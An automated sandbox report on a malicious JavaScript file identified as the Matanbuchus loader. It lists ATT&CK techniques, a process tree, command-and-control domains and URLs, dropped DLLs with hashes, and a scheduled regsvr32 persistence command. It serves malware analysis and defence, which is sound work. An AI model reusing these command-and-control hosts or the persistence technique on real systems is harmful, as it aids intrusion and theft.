                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,5_2_7FB543AE
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetACP,IsValidCodePage,GetLocaleInfoW,5_2_7FB5A2ED
                  Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB41534 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,5_2_7FB41534
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_6B6251C0 DllInstall,GetTempFileNameW,GetFileType,GetSystemDirectoryA,LoadLibraryA,GetUserNameA,lstrlenA,lstrlenA,7_2_6B6251C0
                  Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information2
                  Scripting
                  1
                  Replication Through Removable Media
                  11
                  Windows Management Instrumentation
                  2
                  Scripting
                  1
                  DLL Side-Loading
                  1
                  Disable or Modify Tools
                  OS Credential Dumping1
                  System Time Discovery
                  Remote Services1
                  Archive Collected Data
                  2
                  Ingress Tool Transfer
                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts2
                  Native API
                  1
                  DLL Side-Loading
                  11
                  Process Injection
                  1
                  Deobfuscate/Decode Files or Information
                  LSASS Memory11
                  Peripheral Device Discovery
                  Remote Desktop ProtocolData from Removable Media11
                  Encrypted Channel
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)3
                  Obfuscated Files or Information
                  Security Account Manager1
                  Account Discovery
                  SMB/Windows Admin SharesData from Network Shared Drive11
                  Non-Standard Port
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                  DLL Side-Loading
                  NTDS1
                  File and Directory Discovery
                  Distributed Component Object ModelInput Capture3
                  Non-Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  File Deletion
                  LSA Secrets36
                  System Information Discovery
                  SSHKeylogging4
                  Application Layer Protocol
                  Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts31
                  Masquerading
                  Cached Domain Credentials31
                  Security Software Discovery
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
                  Virtualization/Sandbox Evasion
                  DCSync1
                  Process Discovery
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
                  Process Injection
                  Proc Filesystem21
                  Virtualization/Sandbox Evasion
                  Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                  Rundll32
                  /etc/passwd and /etc/shadow1
                  System Owner/User Discovery
                  Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                  System Network Configuration Discovery
                  Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1570376 Sample: Doc_21-04-53.js Startdate: 06/12/2024 Architecture: WINDOWS Score: 96 43 security-patches.systems 2->43 45 axizlhop.life 2->45 51 Suricata IDS alerts for network traffic 2->51 53 Malicious sample detected (through community Yara rule) 2->53 55 Yara detected Matanbuchus 2->55 57 3 other signatures 2->57 8 msiexec.exe 15 38 2->8         started        12 regsvr32.exe 2->12         started        14 wscript.exe 1 2->14         started        17 regsvr32.exe 2->17         started        signatures3 process4 dnsIp5 47 axizlhop.life 104.21.40.3, 443, 49704 CLOUDFLARENETUS United States 8->47 33 C:\Users\user\AppData\Roaming\...\libcurl.dll, PE32 8->33 dropped 35 C:\Windows\Installer\MSICCA1.tmp, PE32 8->35 dropped 37 C:\Windows\Installer\MSICC71.tmp, PE32 8->37 dropped 39 2 other files (none is malicious) 8->39 dropped 19 rundll32.exe 8->19         started        21 msiexec.exe 8->21         started        23 regsvr32.exe 10 12->23         started        61 Windows Scripting host queries suspicious COM object (likely to drop second stage) 14->61 26 regsvr32.exe 10 17->26         started        file6 signatures7 process8 signatures9 28 rundll32.exe 2 18 19->28         started        59 System process connects to network (likely due to code injection or exploit) 23->59 process10 dnsIp11 49 security-patches.systems 185.234.216.175, 443, 4443, 49705 SPRINT-SDCPL Poland 28->49 41 C:\Users\user\8f08\724536\724536.winmd, PE32 28->41 dropped 63 Found evasive API chain (may stop execution after checking mutex) 28->63 65 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 28->65 file12 signatures13

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  C:\Users\user\8f08\724536\724536.winmd5%ReversingLabs
                  C:\Users\user\AppData\Roaming\silver\libcurl.dll5%ReversingLabs
                  C:\Windows\Installer\MSICA2D.tmp0%ReversingLabs
                  C:\Windows\Installer\MSICC41.tmp0%ReversingLabs
                  C:\Windows\Installer\MSICC71.tmp0%ReversingLabs
                  C:\Windows\Installer\MSICCA1.tmp0%ReversingLabs
                  No Antivirus matches
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  https://security-patches.systems/verif.aspxv0%Avira URL Cloudsafe
                  https://security-patches.systems/0%Avira URL Cloudsafe
                  http://security-patches.systems/WinDefUpdates/DefenderUpdates/index.php0%Avira URL Cloudsafe
                  https://security-patches.systems/verif.aspxo0%Avira URL Cloudsafe
                  http://schemas.xml0%Avira URL Cloudsafe
                  https://security-patches.systems/verif.aspx4A0%Avira URL Cloudsafe
                  https://security-patches.systems/AdminAccounts.aspx0%Avira URL Cloudsafe
                  https://security-patches.systems/verif.aspx0%Avira URL Cloudsafe
                  https://axizlhop.life/klog.php0%Avira URL Cloudsafe
                  http://schemas.xmlfilename_too_long0%Avira URL Cloudsafe
                  https://axizlhop.life/klog.php6934511675634-100;0%Avira URL Cloudsafe
                  https://axizlhop.life/klog.php6934511675634-1000%Avira URL Cloudsafe
                  https://security-patches.systems/verif.aspxb0%Avira URL Cloudsafe
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  axizlhop.life
                  104.21.40.3
                  truefalse
                    unknown
                    security-patches.systems
                    185.234.216.175
                    truetrue
                      unknown
                      NameMaliciousAntivirus DetectionReputation
                      https://security-patches.systems/AdminAccounts.aspxtrue
                      • Avira URL Cloud: safe
                      unknown
                      https://axizlhop.life/klog.phpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://security-patches.systems/verif.aspxtrue
                      • Avira URL Cloud: safe
                      unknown
                      http://security-patches.systems/WinDefUpdates/DefenderUpdates/index.phptrue
                      • Avira URL Cloud: safe
                      unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      https://security-patches.systems/verif.aspxorundll32.exe, 00000005.00000003.2169062650.00000000027E1000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://security-patches.systems/rundll32.exe, 00000005.00000003.2169062650.00000000027E1000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://schemas.xmlfilename_too_longrundll32.exe, 00000005.00000002.3322423322.0000000004D33000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://security-patches.systems/verif.aspx4Arundll32.exe, 00000005.00000003.2169062650.00000000027E1000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://security-patches.systems/verif.aspxvrundll32.exe, 00000005.00000003.2169062650.00000000027E1000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://schemas.xmlregsvr32.exefalse
                      • Avira URL Cloud: safe
                      unknown
                      https://axizlhop.life/klog.php6934511675634-100wscript.exe, 00000000.00000003.2093594028.000001FCAF3F4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2093846419.000001FCAF3F4000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://axizlhop.life/klog.php6934511675634-100;wscript.exe, 00000000.00000003.2094240029.000001FCAF3FD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2094103772.000001FCAF3FC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2093925424.000001FCAF3F6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2094675050.000001FCAF3FD000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://security-patches.systems/verif.aspxbrundll32.exe, 00000005.00000003.2169062650.00000000027E1000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs
                      IPDomainCountryFlagASNASN NameMalicious
                      185.234.216.175
                      security-patches.systemsPoland
                      197226SPRINT-SDCPLtrue
                      104.21.40.3
                      axizlhop.lifeUnited States
                      13335CLOUDFLARENETUSfalse
                      Joe Sandbox version:41.0.0 Charoite
                      Analysis ID:1570376
                      Start date and time:2024-12-06 22:10:10 +01:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 7m 48s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:12
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • GSI enabled (Javascript)
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:Doc_21-04-53.js
                      Detection:MAL
                      Classification:mal96.troj.evad.winJS@14/21@3/2
                      EGA Information:
                      • Successful, ratio: 100%
                      HCA Information:Failed
                      Cookbook Comments:
                      • Found application associated with file extension: .js
                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                      • Report size exceeded maximum capacity and may have missing disassembly code.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                      • VT rate limit hit for: Doc_21-04-53.js
                      TimeTypeDescription
                      16:11:05API Interceptor1x Sleep call for process: msiexec.exe modified
                      16:11:35API Interceptor54x Sleep call for process: rundll32.exe modified
                      22:11:11Task SchedulerRun new task: {62A231D3-BB5C-4333-BEA8-3365C68119A4} path: C:\Windows\System32\regsvr32.exe s>-e -n -i:"C:\Users\user\8f08\724536\724536.winmd" "C:\Users\user\8f08\724536\724536.winmd"
                      No context
                      No context
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      SPRINT-SDCPLhttps://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp/email.email.panda%C2%ADdoc%C2%AD.net/c/eJxUkE2P2yAQhn-NuWWFARt88CFVY612oypR2m7UywqGwSGJDcLY3c2vryJ1-3EbjeZ99MxrW1Nz4xSxAeYBx_zqbdufVQy8WvbnZ4mHr1v5vX_uDcG2lJxXVAlZk1MLSiPjHKRWYBw4lJZJCRqkEVJZQXzLKBMlo3WpqKz4g6l4zS03pmSmLmVZCIqD9teHqEerbYCHETPx02tOGlCbK7Y5zUiu7SnnOBV8XbCuYJ2O8W8EwlCw7kO_YN3CCt7lcMGx4J8NSlVVAgyKymkGjIKWqBoJ3DlUXIGiDUhX8I6MIXvnQWcfxnsNzgkqLMCqwQZWolF0pTk0K0qZQ7S1QVeTkHo9-tuf0GZ5eheeH9Pm7by_vbzf7PD4ZUdSG09zSoWgIWY_zMOUtXN-7O_-JOHip9-A-fB43HRxdxy-Qfi03b-sbbxIktuPF_8ZV1mnHv_bTPeLpWXkZ0iXKWrAO3SXD-unw3Y8i7e8HH7ki-bz5H4FAAD__zN8qVcGet hashmaliciousUnknownBrowse
                      • 188.68.242.180
                      https://app.pandadoc.com/document/v2?token=4f650edf0fbe63c284330a0c3237efbdcb934f50?Get hashmaliciousUnknownBrowse
                      • 188.68.242.180
                      https://email.email.pandadoc.net/c/eJxUkMtu2zoQhp9G3NkQZ0SJXHBh4xy1QJrAgdMgyCbgZWgRtkRFou0qT18YaHrZDQbzDb7_99rWaINkPrlzT0N-i15vjtunx_Nc993rcr7cH5Zt3O4TI80bLFGBkBXrNArVmFqSVAGENw14FwCtIRCuVihY1FBCxUvkvMYacM0x2FDzyjloQt34oiqpN_G0Hs3gjU9uPVBmcX7Lk3Fk7Il0ns7ETrrLeZwL3BTQFtCacfyDuNQX0H7qF9BeoMA2pyMNBf5HygF3aEMVlOCukaJBAUII5AqxaSyEiqRyBbZsSDmG6EyOabjVwA1BjRJWQflyVUniK2mNWwWrZOld8KoOLE0HM8SP31Aks8XnL92iWvXuuuHu8WX3umOTns1woNOpqMpzTmM0IdqJbvZsokucf-H2-rw8zN-_3t_9oIeXfrffbPaqYll_BvxrXGUzHeifzXy7uGhg1zQd59E4uj192kkv3bel-_j_kK--n6-b5t39DAAA__9AXKZYGet hashmaliciousUnknownBrowse
                      • 188.68.242.180
                      https://app.pandadoc.com/document/v2?token=e9c21c3bf4f951c78573525553193377b2f4e89c?Get hashmaliciousUnknownBrowse
                      • 188.68.242.180
                      https://app.pandadoc.com/document/v2?token=abf6587d58630a40e08d0ad15de8202e2e9c4af5Get hashmaliciousUnknownBrowse
                      • 188.68.242.180
                      https://email.email.pandadoc.net/c/eJxMkE9vEzEQxT_N-pbKO_ba3oMPhWipiEBAoYdeqrE92zVJbGfthD-fHkWi0OOM9Hv6vResU8LNhoXsz0dK7SkG-2Z5fwRKPgf39rRsv4op3T4ujGyvBQcQIxi2WBVmDUaIIJAgaJrROA0G-iB6wRWyaIGD7DmMvZYDqJtej653A7hxHASXppOcjhgPNwVTwJD9TaLGYn1qK3pCdyDb1jOxg11aK7UTtx1MHUxYyn_E52MH04t-B9MFOjG1vKfUia3X2M_Kjc7LORAnLZT03Ds1eE-GBjOKAXojOzGxlFuco8cWc7rOMAQynlBsvBtgI0GJDY6Ob0hzI7AHR0GxvD5jir__QXSR97_ybpvLA1U6_hxPwWtiq625LJE6yfex4rnlgmurV3u20iXWv7hvCj6bWb97PBX_PTp1rg_yE2v2peCm4fpM7fWnUnp9s4sF9iOv-1rQ0zXU7Bzsvn3A0PT9nfmCQ_ioy92fAAAA__-PeqWAGet hashmaliciousUnknownBrowse
                      • 188.68.242.180
                      https://app.pandadoc.com/document/v2?token=2126fee3194112970cb23c51d0c56249323ace2bGet hashmaliciousUnknownBrowse
                      • 188.68.242.180
                      https://email.email.pandadoc.net/c/eJxUkMtu2zoQhp9G3NngTeRowYVzfBggLgr0jnYTDMmRw1imFIm2ET99YaDpZTcYzDf4_j-5YFTogaUxno5U6mNO7vBpPu8_Qjtn233vjPaHL2UbGDlhZQdGA3D25CwqECHxQCRtUKDBEqYowFBHIAzLTnKpBZet0FyIbh36NsUUZbSRWq6o0ZyOmIf1hCVhGuO6UGV5eawzRsIwkKvzidjgnmqdlkZtGukb6XGa_iBxPDbSv-k30p9lo3wdD1QatTUJJEohlFBchxhBckADPJi-N1FZ3iloNeeN8qyMNfc5Ys1judUQjU1gwK5EC2qllcEVWuSrLoChCMIK0bJx3mPJ19_Q6xTN6_Zu96Pc7y6XXfCBdt0HNrv0PBZaGs3DaTjQy2mYbupspnNefrFYvM3J35vc35X37_6zGK5f_2fVvaX7a1xVnPf0z2a5XZydZJdxPiwTRro9fX4wlOTmAb-lz_0effAv103-GQAA__9hXKLJGet hashmaliciousUnknownBrowse
                      • 188.68.242.180
                      kingdom.ps1Get hashmaliciousAtlantida StealerBrowse
                      • 185.234.216.181
                      cabbage.exeGet hashmaliciousAtlantida StealerBrowse
                      • 185.234.216.181
                      CLOUDFLARENETUShttps://wrx.dzpvwobr.ru/Get hashmaliciousUnknownBrowse
                      • 172.67.211.61
                      https://www.google.ca/url?q=1120091333775300779273902563687390256368&rct=11200913337753007792&sa=t&url=amp/s/elanpro.net/horeca/dispenc#YnJ1bml0YS5kdW5jYW5AcGFydG5lcnNtZ3UuY29tGet hashmaliciousHTMLPhisherBrowse
                      • 104.26.9.44
                      https://villageforddearborn-my.sharepoint.com/:b:/g/personal/robert_wheat_villageford_net/EaAilHqK5PhBneaYfVtjii0ByKmI10BU9zhQ73pqIHj-uQ?e=FnQ6KLGet hashmaliciousUnknownBrowse
                      • 104.18.95.41
                      file.exeGet hashmaliciousLummaC StealerBrowse
                      • 172.67.165.166
                      https://t.ly/DDbriGet hashmaliciousUnknownBrowse
                      • 104.20.6.133
                      file.exeGet hashmaliciousLummaC StealerBrowse
                      • 104.21.16.9
                      https://m0g9861wc1.execute-api.us-east-1.amazonaws.com/uyt/#alissa.bessette@eastwesttea.comGet hashmaliciousHTMLPhisher, ReCaptcha PhishBrowse
                      • 104.19.229.21
                      https://hujalconcretos.com/nppGet hashmaliciousUnknownBrowse
                      • 104.18.11.207
                      file.exeGet hashmaliciousLummaC StealerBrowse
                      • 104.21.16.9
                      https://displaysolution.ca/advertising-inflatable-tents.htmlGet hashmaliciousUnknownBrowse
                      • 104.21.79.176
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      28a2c9bd18a11de089ef85a160da29e4file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                      • 104.21.40.3
                      https://wrx.dzpvwobr.ru/Get hashmaliciousUnknownBrowse
                      • 104.21.40.3
                      https://www.google.ca/url?q=1120091333775300779273902563687390256368&rct=11200913337753007792&sa=t&url=amp/s/elanpro.net/horeca/dispenc#YnJ1bml0YS5kdW5jYW5AcGFydG5lcnNtZ3UuY29tGet hashmaliciousHTMLPhisherBrowse
                      • 104.21.40.3
                      https://villageforddearborn-my.sharepoint.com/:b:/g/personal/robert_wheat_villageford_net/EaAilHqK5PhBneaYfVtjii0ByKmI10BU9zhQ73pqIHj-uQ?e=FnQ6KLGet hashmaliciousUnknownBrowse
                      • 104.21.40.3
                      https://t.ly/DDbriGet hashmaliciousUnknownBrowse
                      • 104.21.40.3
                      https://inovamora.com/team/index.htmlGet hashmaliciousHTMLPhisherBrowse
                      • 104.21.40.3
                      file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                      • 104.21.40.3
                      file.exeGet hashmaliciousLummaC StealerBrowse
                      • 104.21.40.3
                      https://hujalconcretos.com/nppGet hashmaliciousUnknownBrowse
                      • 104.21.40.3
                      file.exeGet hashmaliciousLummaC StealerBrowse
                      • 104.21.40.3
                      37f463bf4616ecd445d4a1937da06e19resume.docx.lnkGet hashmaliciousUnknownBrowse
                      • 185.234.216.175
                      JSWunwO4rS.lnkGet hashmaliciousLummaC StealerBrowse
                      • 185.234.216.175
                      apilibx64.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                      • 185.234.216.175
                      Fortexternal.exeGet hashmaliciousUnknownBrowse
                      • 185.234.216.175
                      Setup.msiGet hashmaliciousUnknownBrowse
                      • 185.234.216.175
                      Document_PDF.vbsGet hashmaliciousFormBookBrowse
                      • 185.234.216.175
                      Pr9cqW75nY.lnkGet hashmaliciousUnknownBrowse
                      • 185.234.216.175
                      G3vWD786PN.lnkGet hashmaliciousUnknownBrowse
                      • 185.234.216.175
                      hTXtTJXdLt.lnkGet hashmaliciousUnknownBrowse
                      • 185.234.216.175
                      fqufh5EOJr.lnkGet hashmaliciousUnknownBrowse
                      • 185.234.216.175
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      C:\Windows\Installer\MSICA2D.tmpfes.msiGet hashmaliciousBruteRatel, LatrodectusBrowse
                        zdi.txt.msiGet hashmaliciousBruteRatel, LatrodectusBrowse
                          merd.msiGet hashmaliciousUnknownBrowse
                            medk.msiGet hashmaliciousBruteRatel, LatrodectusBrowse
                              lavi.msiGet hashmaliciousBruteRatel, LatrodectusBrowse
                                Document-v09-42-38.jsGet hashmaliciousBruteRatelBrowse
                                  Document-v05-53-20.jsGet hashmaliciousBruteRatel, LatrodectusBrowse
                                    FW3x3p4eZ5.msiGet hashmaliciousBazar Loader, BruteRatelBrowse
                                      Document-19-06-38.jsGet hashmaliciousBruteRatelBrowse
                                        Document-19-06-38.jsGet hashmaliciousBruteRatelBrowse
                                          Process:C:\Windows\System32\msiexec.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):1360
                                          Entropy (8bit):5.724925883514744
                                          Encrypted:false
                                          SSDEEP:24:GbOg4BtTUTXNT6TYggmbtMpUUUFPzloDhiSVzAvQs+D6:GaSTQ0KsePiD8SVo3+D6
                                          MD5:98A3004291552F9D602FCC634F0668D6
                                          SHA1:667B802CF81CE0117EA7CEFCD9A3E77BD66A3E20
                                          SHA-256:4296BE9D5596A8FA12B829ACD833B798437B86E68633B521DB3BF402FDE2764D
                                          SHA-512:872F5BEF8A543D992E55F283831DDCECC1670CA96E36078A2E024BE132049A888AC4E1D74446953CF7B366B65CB4B5F84D1C47C50C15E9B277F7ABCDC0B77D1E
                                          Malicious:false
                                          Preview:...@IXOS.@.....@s..Y.@.....@.....@.....@.....@.....@......&.{77E11148-E1F4-45C0-AAA9-BBA409C05474}..ProSoftware..klog.php.@.....@.....@.....@........&.{3E648317-E941-449A-AF72-39AC6882CB87}.....@.....@.....@.....@.......@.....@.....@.......@......ProSoftware......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{B48CC27C-9823-4256-8235-834BFD2D0DBB}&.{77E11148-E1F4-45C0-AAA9-BBA409C05474}.@......&.{4A323D5F-6D73-4C26-8E39-BE8928DA13EB}&.{77E11148-E1F4-45C0-AAA9-BBA409C05474}.@......&.{08BCD781-A01D-4960-A91D-D4E69633EB46}&.{77E11148-E1F4-45C0-AAA9-BBA409C05474}.@........CreateFolders..Creating folders..Folder: [1]#.8.C:\Users\user\AppData\Roaming\Blueray INC\ProSoftware\.@........InstallFiles..Copying new files&.File: [1], Directory: [9], Size: [6]..'.C:\Users\user\AppData\Roaming\silver\....2.C:\Users\user\AppData\Roaming\silver\libcurl.dll....WriteRegistryValues..Writing system registr
                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):319488
                                          Entropy (8bit):6.566831510478186
                                          Encrypted:false
                                          SSDEEP:6144:l36YH14eJJkVRujDjVBBUUE5xN8PzTtSIgqbzJX3+uFrn:V6YVvJDj/VBU3N8uqRX3Brn
                                          MD5:AD47745AB2AEB60334491BA213BDCF73
                                          SHA1:8D8320BF0CC069F107D1EE3245D7F8BDFF7D3101
                                          SHA-256:394401B1205D1CC5E6AF1F25183941428651E8DE0E715C5E954E25C6E49D4371
                                          SHA-512:9FD19931F2365D64B8D7CBC4BBEF7544F031C6515FAB728D1E11020CAC6070051E186CEB7E52429DEF6F559E58DB099D00D46B3BAE9BCA34AA0226B9160FE1C8
                                          Malicious:true
                                          Yara Hits:
                                          • Rule: JoeSecurity_Matanbuchus, Description: Yara detected Matanbuchus, Source: C:\Users\user\8f08\724536\724536.winmd, Author: Joe Security
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 5%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........6=..Xn..Xn..Xn..[o..Xn..]oL.Xn..\o..Xn.Y]o..Xn.Y\o..Xn.Y[o..Xn..Yo..Xn..Yn..Xn.Y]o..Xn.YXo..Xn.YZo..XnRich..Xn........PE..L...%.Rg.........."!...&......L.....{.........................................O.....$A....@.........................@...........x.....O.h.....................O.PK......................................@............................................text...`........................... ..`.rdata..............................@..@.data...\.J.........................@....reloc..PK....O..L..................@..B.rsrc...h.....O.....................@..@................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Windows\System32\msiexec.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):319488
                                          Entropy (8bit):6.566831510478186
                                          Encrypted:false
                                          SSDEEP:6144:l36YH14eJJkVRujDjVBBUUE5xN8PzTtSIgqbzJX3+uFrn:V6YVvJDj/VBU3N8uqRX3Brn
                                          MD5:AD47745AB2AEB60334491BA213BDCF73
                                          SHA1:8D8320BF0CC069F107D1EE3245D7F8BDFF7D3101
                                          SHA-256:394401B1205D1CC5E6AF1F25183941428651E8DE0E715C5E954E25C6E49D4371
                                          SHA-512:9FD19931F2365D64B8D7CBC4BBEF7544F031C6515FAB728D1E11020CAC6070051E186CEB7E52429DEF6F559E58DB099D00D46B3BAE9BCA34AA0226B9160FE1C8
                                          Malicious:true
                                          Yara Hits:
                                          • Rule: JoeSecurity_Matanbuchus, Description: Yara detected Matanbuchus, Source: C:\Users\user\AppData\Roaming\silver\libcurl.dll, Author: Joe Security
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 5%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........6=..Xn..Xn..Xn..[o..Xn..]oL.Xn..\o..Xn.Y]o..Xn.Y\o..Xn.Y[o..Xn..Yo..Xn..Yn..Xn.Y]o..Xn.YXo..Xn.YZo..XnRich..Xn........PE..L...%.Rg.........."!...&......L.....{.........................................O.....$A....@.........................@...........x.....O.h.....................O.PK......................................@............................................text...`........................... ..`.rdata..............................@..@.data...\.J.........................@....reloc..PK....O..L..................@..B.rsrc...h.....O.....................@..@................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Windows\System32\msiexec.exe
                                          File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {3E648317-E941-449A-AF72-39AC6882CB87}, Number of Words: 10, Subject: ProSoftware, Author: Blueray INC, Name of Creating Application: ProSoftware, Template: ;1033, Comments: Set database, Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
                                          Category:dropped
                                          Size (bytes):978944
                                          Entropy (8bit):6.982712024960584
                                          Encrypted:false
                                          SSDEEP:12288:xtu6QnN5MN+Y9x0ECIgYOx5fnL/tYi8OBZr7AicRXrdq3u8bJk:xtuxnNTY9x0ECIgYmfLVYeBZr7AM
                                          MD5:18D5F1A9BFB3E34FF25BBDA3F05D386F
                                          SHA1:4B4394E1C8D91B4D7D1BEC0C4A443FA08243994F
                                          SHA-256:55A33165FBA0F7134E4CA482E0951C143B04E6A0E78FDC5F702E74E08BFD9249
                                          SHA-512:050747B91C89396A945E3A7E4BBE10F16CE2627D531DB087DDEF86817FBD9FD1C4E067D3CBB522380D2B1A5F50696797064A19E78DD5A8ABC5A35C03DBE843FE
                                          Malicious:false
                                          Preview:......................>.......................................................D.......`......................................./...0.......................................................................................................................................................................................................................................................................................................................................................................................................;...........!...3............................................................................................... ...+..."...#...$...%...&...'...(...)...*...1...,...-......./...0...4...2...:...?...5...6...7...8...9...>...<.......=...........@...A...B...C...........F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                          Process:C:\Windows\System32\msiexec.exe
                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):446944
                                          Entropy (8bit):6.403916470886214
                                          Encrypted:false
                                          SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                          MD5:475D20C0EA477A35660E3F67ECF0A1DF
